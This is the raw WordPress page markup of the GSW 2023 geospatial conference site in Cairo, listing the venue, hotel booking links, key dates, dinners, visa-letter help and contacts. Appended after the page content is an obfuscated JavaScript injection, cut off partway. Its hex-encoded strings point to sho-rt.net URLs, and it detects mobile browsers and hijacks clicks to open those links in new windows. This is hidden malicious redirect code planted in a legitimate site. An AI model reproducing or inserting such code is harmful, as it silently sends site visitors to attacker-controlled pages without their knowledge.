FunTrip More Detail[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 